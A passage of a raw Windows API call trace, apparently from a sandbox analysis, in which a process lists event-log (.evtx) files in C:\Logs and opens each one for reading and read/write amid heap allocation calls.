ftLastAccessTime.dwLowDateTime=0x8783aa15, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-CodeIntegrity%4Operational.evtx", cAlternateFileName="MI03A7~1.EVT")) returned 1 [0071.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0071.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0071.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0071.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0071.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0071.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46b38 [0071.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0071.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0071.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0071.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0071.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0071.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0071.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0071.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0071.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0071.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0071.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0071.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0071.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0071.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0071.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0071.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0071.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0071.758] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0071.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.758] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0071.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0071.759] AreFileApisANSI () returned 1 [0071.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpUsedDefaultChar=0x0) returned 58 [0071.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0071.759] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.759] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0071.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0071.759] AreFileApisANSI () returned 1 [0071.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0071.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0071.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 58 [0071.759] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.759] GetFileType (hFile=0x428) returned 0x1 [0071.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0071.760] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.760] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.760] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.760] CloseHandle (hObject=0x428) returned 1 [0071.760] AreFileApisANSI () returned 1 [0071.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0071.760] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0071.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 58 [0071.760] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.760] GetFileType (hFile=0x428) returned 0x1 [0071.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0071.761] CloseHandle (hObject=0x428) returned 1 [0071.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0071.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0071.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0071.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0071.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0071.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0071.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0071.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0071.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0071.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0071.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0071.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0071.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0071.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0071.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0071.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0071.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0071.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0071.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0071.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0071.761] AreFileApisANSI () returned 1 [0071.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0071.761] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a630 [0071.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6a630, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 58 [0071.761] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8783aa15, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8783aa15, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.761] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0071.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0071.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0071.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.762] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.762] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3c71c5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3c71c5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", cAlternateFileName="MI5CA2~1.EVT")) returned 1 [0071.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0071.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x694e0 [0071.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0071.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0071.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x694e0 | out: hHeap=0x20000) returned 1 [0071.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x30c98 [0071.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0071.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0071.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0071.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0071.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0071.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0071.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x30c98 | out: hHeap=0x20000) returned 1 [0071.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0071.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0071.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0071.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0071.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0071.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0071.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0071.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0071.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0071.762] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0071.762] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0071.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0071.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ae18 [0071.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0071.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0071.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0071.763] AreFileApisANSI () returned 1 [0071.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpUsedDefaultChar=0x0) returned 72 [0071.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0071.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.763] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0071.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0071.763] AreFileApisANSI () returned 1 [0071.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0071.763] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0071.763] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=72 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 72 [0071.763] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.763] GetFileType (hFile=0x428) returned 0x1 [0071.763] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0071.764] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0071.764] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0071.764] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0071.764] CloseHandle (hObject=0x428) returned 1 [0071.764] AreFileApisANSI () returned 1 [0071.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0071.764] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0071.764] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=72 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 72 [0071.764] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0071.764] GetFileType (hFile=0x428) returned 0x1 [0071.764] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0071.765] CloseHandle (hObject=0x428) returned 1 [0071.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0071.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0071.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0071.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6dfa8 [0071.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0071.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0071.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0071.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dfa8 | out: hHeap=0x20000) returned 1 [0071.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0071.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0071.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0071.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0071.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0071.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0071.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0071.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0071.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0071.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0071.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0071.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0071.765] AreFileApisANSI () returned 1 [0071.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0071.765] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0071.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=72 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 72 [0071.765] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3c71c5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3c71c5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0071.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0071.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0071.765] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0071.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0071.766] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.766] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0071.766] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", cAlternateFileName="MI5FD1~1.EVT")) returned 1 [0071.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0071.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0071.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0071.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0071.766] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0071.766] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, 